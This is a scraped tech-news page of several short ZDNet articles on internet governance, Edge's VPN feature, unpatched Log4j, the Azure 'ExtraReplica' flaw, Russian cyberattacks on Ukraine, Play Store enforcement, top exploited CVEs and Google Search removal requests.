Information Technology

The United States, European Union, ex-EU member the United Kingdom, and 32 other nations have committed to the Declaration for the Future of the Internet [PDF], an agreement to strengthen democracy online by agreeing to not undermine elections by running online misinformation campaigns, or illegally spy on people, the White House said on Thursday. The declaration also commits to promote safety, particularly among young people and women, and the equitable use of the internet. Further, the countries have agreed to refrain from imposing government-led shutdowns and committed to providing affordable and reliable internet services.Although not legally binding, the declaration states that the principles should be used “as a reference for public policy makers, as well as citizens, businesses, and civil society organizations”.In a statement the White House claimed it would work together with partner nations to promote the declaration’s principles, but that a mutual respect should be held for each individual nation’s regulatory autonomy. So far, 60 countries have endorsed the declaration, and according to the European Commission, more are expected to join in the coming weeks.Notable omissions include India, China, and Russia. Their absence is hardly surprising given that Ukraine is a signatory, and that the declaration calls on countries to refrain from using social score cards, a transparent criticism of China’s social credit score. Meanwhile, a senior Biden administration official responded to India’s absence by claiming “the hope remains that time isn’t fully passed yet for India to join”.Google responded in support of the declaration, but made clear that the private sector must also play an important role in furthering internet standards when faced with global crisis.”Since Russia’s invasion in Ukraine, our teams have been working around the clock to support people in Ukraine through our products, defend against cybersecurity threats, and surface high-quality, reliable information,” said Google in a statement.Microsoft president and vice chair Brad Smith shared this sentiment as he claimed in a blog post that governments cannot manage the global challenges facing the management of the internet alone.”We need new and innovative internet initiatives that bring governments together with NGOs, academic researchers, tech companies and many others from across the business community,” said Smith.Signatories beyond the US, UK, and 27 EU members include: Albania, Andorra, Argentina, Australia, Cabo Verde, Canada, Colombia, Costa Rica, Dominican Republic, Georgia, Iceland, Israel, Jamaica, Japan, Kenya, Kosovo, Maldives, Marshall Islands, Micronesia, Moldova, Montenegro, New Zealand, Niger, North Macedonia, Palau, Peru, Senegal, Serbia, Taiwan, Trinidad and Tobago, Ukraine, and Uruguay.Related Coverage More

Written by

Mary Jo Foley, Contributor

Mary Jo Foley
Contributor

Mary Jo Foley has covered the tech industry for 30 years for a variety of publications, including ZDNet, eWeek, and Baseline. She is the author of Microsoft 2.

Full Bio

Microsoft is looking to give its Edge browser an extra security boost with a coming feature called “Edge Secure Network.” The coming VPN service will be powered by Cloudflare, as noted in a recently discovered Microsoft Support page about the feature. (Thanks to XDA Developers for the link.)Edge Secure Network isn’t yet available to Edge Dev Channel testers, and there’s no indication when it will be. The new Secure Network feature requires users to be signed into their Microsoft Accounts and provides 1 GB of free data per month that is tied to users’ Microsoft Accounts. Edge Secure Network will encrypt users’ Internet connections by routing data from Edge through an encrypted tunnel to create a secure connection, “even when using a non-secure URL that starts with HTTP,” the support page says. Thanks to this encryption, users will get an extra layer of protection from hackers accessing browsing data via shared public Wi-Fi networks. Cloudflare permanently deletes any diagnostic and support data collected every 25 hours. The Edge Secure Network capability also can help prevent online tracking, keep users’ locations private and will be available for free, the support page indicates. Users will get 1 GB of free data every month when they are signed in with their Microsoft Accounts. Instructions for turning on Secure Network, once it’s available, are on the Edge support page article. Some other browser vendors like Opera already have VPN integration. And Mozilla, while not integrating its own VPN into Firefox, has made its VPN available separately to customers. More

Months on from a critical zero-day vulnerability being disclosed in the widely-used Java logging library Apache Log4j, a significant number of applications and servers are still vulnerable to cyberattacks because security patches haven’t been applied. First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j. 

Not only is the vulnerability relatively simple to take advantage of, but the ubiquitous nature of Log4j means that it’s embedded in a vast array of applications, services and enterprise software tools that are written in Java – and used by organisations and individuals around the world. SEE: Google: Multiple hacking groups are using the war in Ukraine as a lure in phishing attemptsIt’s why director of US cybersecurity and infrastructure agency CISA, Jen Easterly, described the vulnerability as “one of the most serious that I’ve seen in my entire career, if not the most serious”. But despite critical warnings over the vulnerability, there’s still a large amount of Log4j instances operating in the wild that have yet to be patched and are still exposed to cyberattacks. According to researchers at cybersecurity company Rezilion, there’s over 90,000 vulnerable internet-facing applications and more than 68,000 servers that are still publicly exposed.  The exposed instances were discovered by running searches through Internet of Things (IoT) search engine Shodan – and researchers warn that what’s been discovered is likely “just the tip of the iceberg” in terms of the actual vulnerable attack surface. Log4j vulnerabilities leave organisations open to various cyberattacks from cyber criminals who can easily scan for vulnerable instances to exploit. Not long after Log4j was disclosed, attempts were made to deploy ransomware and crypto-mining malware on vulnerable servers. State-sponsored hacking groups have also been spotted attempting to take advantage of Log4j vulnerabilities. These include Chinese state-sponsored espionage groups Hafnium and APT41, as well as Iranian-backed hacking groups APT35 and Tunnel Vision. While state-sponsored hacking groups are likely to have deep pockets and plentiful resources, the ability to exploit common vulnerabilities is particularly useful as attacks are less likely to leave traces that could be tied to a specific hacking group.One of the reasons why Log4j vulnerabilities are still lingering is because the flaw could be deeply ingrained in applications, to the extent that it might not even be clear that the Java logging library is even part of that system. SEE: The Emotet botnet is back, and it has some new tricks to spread malwareBut there are steps that can – and should – be taken to ensure the network is protected against attacks trying to exploit Log4j, the most vital of which is identifying and patching insecure instances of Log4j. The network should also be regularly examined to help identify potential vulnerabilities. “You need to have processes in place that continuously monitor your environment for critical vulnerabilities with an emphasis on third-party code,” said the report. If a vulnerable Log4j asset is identified, it’s recommended that information security teams act on the basis that the system has been compromised, to look for signs of potential malicious activity and to prepare to take action.  MORE ON CYBERSECURITY More

Microsoft has patched a security weakness in Azure PostgreSQL which could have been exploited to execute malicious code.

On Thursday, researchers from Wiz Research published an advisory on “ExtraReplica,” described as a “cross-account database vulnerability” in Azure’s infrastructure.Microsoft Azure is a hybrid cloud service and accounts for hundreds of thousands of enterprise customers. According to Wiz, a “chain” of vulnerabilities could be used to bypass Azure’s tenant isolation, which prevents software-as-a-service (SaaS) systems customers from accessing resources belonging to other tenants. ExtraReplica’s core attack vector is based on a flaw that allowed attackers read access to PostgreSQL databases without authorization. Once a target, public PostgreSQL Flexible Server has been selected, an attacker has to find the target’s Azure region “by resolving the database domain name and matching it to one of Azure’s public IP ranges,” according to Wiz. An attacker-controlled database then has to be created in the same region. The first vulnerability, found in Azure’s PostgreSQL engine modifications, would be exploited on the attacker-controlled instance, leading to escalated ‘superuser’ privileges and the ability to execute code. The second bug in the chain, buried in the certificate authentication process, would then be triggered on the target instance via replication to gain read access. While this attack could be used on a subnet, the Certificate Transparency feed could also be abused to retrieve domain SSL certificates and extract a database’s unique identifier, thereby expanding the potential attack surface beyond a subnet. An attacker would need to retrieve target information from the Certificate Transparency feed and purchase a “specifically crafted certificate” from a CA to perform such an exploit. The vulnerability doesn’t, however, impact Single Server instances or Flexible servers with “VNet network configuration (Private access)” enabled, according to the researchers. The vulnerability was disclosed to Microsoft in January. Microsoft’s security team triaged the vulnerability and was able to replicate the flaw. Wiz was awarded a bug bounty of $40,000 for its report and a fix was rolled out by February 25 by the Redmond giant. Now fully mitigated, Azure customers do not need to take any action. Microsoft is not aware of any exploitation in the wild. “We appreciate MSRC’s cooperation and their attentiveness to our report,” the researchers commented. “Their professional approach and close communication throughout the disclosure process is a model for all vendors.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Microsoft warns it saw six Russia-aligned, state-sponsored hacking groups launch over 237 cyberattacks against Ukraine starting in the weeks before Russia’s February 24 invasion.Microsoft has released an in-depth report detailing how Russian cyberattacks against Ukraine were “strongly correlated” or “directly timed” with its military operations in the country. 

ZDNet Recommends

For example, on March 1, several Kyiv-based media companies were struck by destructive and information-stealing malware, which coincided with a missile strike on a Kyiv TV tower on the same day. SEE: Google: Multiple hacking groups are using the war in Ukraine as a lure in phishing attemptsThen on March 13, a suspected Russian nation-state actor stole data from a nuclear safety organization, aligning with Russian troops seizing the Chernobyl nuclear power plant and the Zaporizhzhia Nuclear Power plant.The report takes a closer look at Russia’s use of destructive malware during and before the invasion, the first of which was discovered by Microsoft in mid-January and dubbed WhisperGate. The combination of cyber and military points to Russia’s hybrid warfare strategy, according to Microsoft. “Russia’s use of cyberattacks appears to be strongly correlated and sometimes directly timed with its kinetic military operations targeting services and institutions crucial for civilians,” says Corporate Vice President, Customer Security & Trust, Tom Burt.According to the report, the day before Russia’s military invaded Ukraine, operators linked to the GRU – Russia’s military intelligence service – launched destructive wiper attacks on hundreds of systems in Ukrainian government, IT, energy, and financial organizations. Microsoft detected 37 destructive malware attacks against Ukraine between February 24 and April 8 through eight known destructive malware families, including FoxBlade, which Microsoft found in February, FiberLake, IsaacWiper/HermeticWiper/SonicVote, and CaddyWiper, as well as Industroyer2, aimed at industrial control systems (ICS). In many cases, the malware used the SecureDelete utility to wipe data.   The US government two weeks ago warned of suspected Russian malware called Pipedream that was customized to compromise multiple vendors’ ICS equipment. Ukraine officials earlier this month also said they stopped a cyberattack on an energy facility that could have cut power to two million people. “Known and suspected Russian threat actors deployed malware and abused legitimate utilities 37 times to destroy data on targeted systems. SecureDelete is a legitimate Windows utility that threat actors abused to permanently delete data from targeted devices,” Microsoft says in the report. “More than 40% of the destructive attacks were aimed at organizations in critical infrastructure sectors that could have negative second-order effects on the government, military, economy, and people,” Microsoft says. Additionally, 32% of destructive incidents affected Ukrainian government organizations at the national, regional, and city levels.The three main Russian military agencies Microsoft identifies in the report are the GRU, SVR (Russia’s foreign intelligence service), and the FSB or Federal Security Service. The main methods for initial access were phishing, using unpatched vulnerabilities, and compromising IT service providers. Microsoft says Russia’s cyberattacks appeared to “work in tandem” against targets of military activity. However, it was uncertain whether these were coordinated, centralized or if there was just a common set of understood priorities. “At times, computer network attacks immediately preceded a military attack, but those instances have been rare from our perspective. The cyber operations so far have been consistent with actions to degrade, disrupt, or discredit Ukrainian government, military, and economic functions, secure footholds in critical infrastructure, and to reduce the Ukrainian public’s access to information,” Microsoft says.  SEE: Bronze President spies on Russian targets as Ukraine invasion continuesBurt says following Microsoft’s discovery of WhisperGate, it established a secure line of communication with Ukraine officials and has been providing support ever since. In the lead up to the invasion, Microsoft also observed that Russian cyberattacks were growing increasingly loud and disruptive and usually intensified following diplomatic failures related to the conflict with Ukraine and NATO members.Burt urged all organizations to take heed of alerts published by the US Cybersecurity and Infrastructure Security Agency (CISA) and other US government agencies due to fears that NATO military support to Ukraine could see Russia’s efforts expand beyond Ukrainian targets. “Given Russian threat actors have been mirroring and augmenting military actions, we believe cyberattacks will continue to escalate as the conflict rages. Russian nation-state threat actors may be tasked to expand their destructive actions outside of Ukraine to retaliate against those countries that decide to provide more military assistance to Ukraine and take more punitive measures against the Russian government in response to the continued aggression,” warned Burt. This article has been updated to correct the name of the author of Microsoft’s blog, which was by Tom Burt – Corporate Vice President, Customer Security & Trust.
Microsoft More

Google says it blocked 1.2 million apps from being published to the Google Play store because the company detected policy violations in its app review processes, preventing “preventing billions of harmful installations” on Android devices.  Google’s Play Store reviews have often been seen as less strict than those in Apple’s App Store. However, Google is making bigger efforts to protect the privacy and security of people using the three billion active Android devices in use today and it has stopped 1.2 million policy violating apps from being distributed on the Play store through its app review process.  Google says it also banned 190,000 bad accounts in 2021 as part of its efforts to hinder malicious and spammer developers. It also closed 500,00 inactive or abandoned developer accounts. 

“Last year we introduced multiple privacy focused features, enhanced our protections against bad apps and developers, and improved SDK data safety. In addition, Google Play Protect continues to scan billions of installed apps each day across billions of devices to keep people safe from malware and unwanted software,” Google’s Android and Privacy teams said in a blogpost. SEE: Google: We’re spotting more zero-day bugs than ever. But hackers still have it too easyGoogle’s initiatives in 2021 aimed to strike a balance between end-user safety and convenience for the developers whose work drives the Play Store, which had about 3.5 million apps available for download. The volume of transactions on Apple’s and Google’s app stores is staggering. According to mobile ad analytics firm App Annie, consumers spent $170 billion on mobile apps in 2021, with roughly 65% share of revenues going to Apple’s App Store and 35% going to Google Play. Consumers downloaded 230 billion new apps in 2021, or about 435,000 apps per minute. But 98.3 billion of those downloads were by users in China where Google Play is not available, while US consumers accounted for 12 billion of the total.  In an effort to improve transparency for end users, Google introduced a data safety program last May that requires developers to give users details about the types of data collected by an app, the use of encryption, and how data is used. Google requires developers to fix any detected violations of policy. They risk further enforcement if they don’t comply with Google’s requested fixes. Developers have until July 20 to declare to Play store users information required in the data safety initiative.  Google also regularly removes malicious apps from the Play store after they’re discovered by third-party researchers, who still manage to find them on a reasonably regular basis. To help developers manage rejections during the review process, Google has added a Policy and Programs section to the Google Play console for developers. It also has a page to appeal decisions and track the status of a submission.   The benefits of these initiatives are greater for those who’ve upgraded to the latest versions of Android. “As a result of new platform protections and policies, developer collaboration and education, 98% of apps migrating to Android 11 or higher have reduced their access to sensitive APIs and user data,” Google claims. “We’ve also significantly reduced the unnecessary, dangerous, or disallowed use of Accessibility APIs in apps migrating to Android 12, while preserving the functionality of legitimate use cases.”SEE: The best Android phones: Better than the iPhone?Google also noted that it disallowed the collection of Advertising ID (AAID) and other device identifiers from all users in apps solely targeting children. These included identifiers such as the SIM Serial number, MAC address, SSID, IMEI, and IMSI. It also gave all users the ability to delete their Advertising ID entirely, regardless of the app. Google Pixel is a small share of the overall Android market, but these users gained a new Security hub, or a single page to manage all security settings. 

Smartphones More

Written by

Chris Duckett, APAC Editor

Chris Duckett
APAC Editor

Chris started his journalistic adventure in 2006 as the Editor of Builder AU after originally joining CBS as a programmer. After a Canadian sojourn, he returned in 2011 as the Editor of TechRepublic Australia, and is now the Australian Editor of ZDNet.

Full Bio

Image: Shutterstock
During 2021, the top 15 vulnerabilities that were exploited — as observed by the US Cybersecurity and Infrastructure Security Agency, US NSA, US FBI, the Australian Cyber Security Centre, the Canadian Centre for Cyber Security, New Zealand National Cyber Security Centre, and the United Kingdom’s National Cyber Security Centre — led to remote code execution (RCE) across a range of products, and left IT administrators with a short window to keep their house in order. “For most of the top exploited vulnerabilities, researchers or other actors released proof of concept code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors,” the agencies said in an alert. Topping the list was the RCE hole in Java logging library Apache Log4j, also known as Log4Shell, that was disclosed in December. “The rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch,” the alert said. This was followed by CVE-2021-40539, an RCE hole in Zoho ManageEngine, and seven vulnerabilities in Exchange that became known as ProxyShell and ProxyLogin. Next on the list was CVE-2021-26084 in Atlassian Confluence, which US Cybercom warned was facing mass exploitation in September. In this instance, the agencies said the exploit code was released a week after it was disclosed. The final vulnerability from 2021 on the list was CVE-2021-21972, which impacted VMware vSphere. Completing the list was a quartet of vulnerabilities that were highlighted in July, consisting of CVE-2020-1472 in Microsoft Netlogon which is also called Zerologon, CVE-2020-0688 in Exchange, CVE-2019-11510 from Pulse Secure Connect, and CVE-2018-13379 impacting Fortinet FortiOS and FortiProxy. A secondary list of another 15 CVEs was also issued, and included holes in Accellion FTA, and additional RCE bugs in VMware vCenter and the Windows print spooler. To mitigate these vulnerabilities, the agencies repeated advice on timely patching, having a centralised patch management system, and shifting to cloud or managed service providers if rapid scanning is not considered doable. The advice added that organisations should enforce multifactor authentication on all users without exception, with VPN logins in particular called out, as well as regularly reviewing privileged accounts at least yearly and adopting the least privilege principle. Companies should also move to allowlisting, properly segment networks to limit lateral movement, and constantly monitor attack surfaces. Related Coverage More

Written by

Aimee Chanthadavong, Senior Journalist

Aimee Chanthadavong
Senior Journalist

Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

Full Bio

Google has now expanded Google Search removal requests to include additional personally identifiable contact information, such as a person’s phone number, email address, or physical address.Up until now, people have been able to request the removal of other certain sensitive information from Search, such as doxxing content — which is when a person’s contact information is shared in a malicious way — or information like bank account or credit card numbers that could be used for financial fraud.Under the expanded policy, users can also request for the removal of additional information that may pose a risk for identity theft — such as confidential log-in credentials — when it appears in search results. “The availability of personal contact information online can be jarring — and it can be used in harmful ways, including for unwanted direct contact or even physical harm. And people have given us feedback that they would like the ability to remove this type of information from Search in some cases,” Google Search global policy lead Michelle Chang wrote in a post.Chang said when a Google Search removal request is submitted, Google evaluates all the content on the web page. Following the evaluation, Google may remove the provided URL from all search queries; remove the search results in which the query includes a person’s name or other provided identifiers, such as aliases; or in some circumstances deny the request. “We will evaluate all content on the web page to ensure that we’re not limiting the availability of other information that is broadly useful, for instance in news articles,” Chang said. “We’ll also evaluate if the content appears as part of the public record on the sites of government or official sources. In such cases, we won’t make removals.”Google warned, however, that removing content from Google Search does not remove it from the internet, and recommended that people contact the hosting site directly if that is what they want it removed entirely. This latest update follows on from Google rolling out a new policy last October to enable people under the age of 18, or their parents or guardian, to request the removal of their images from Google search results. RELATED COVERAGE More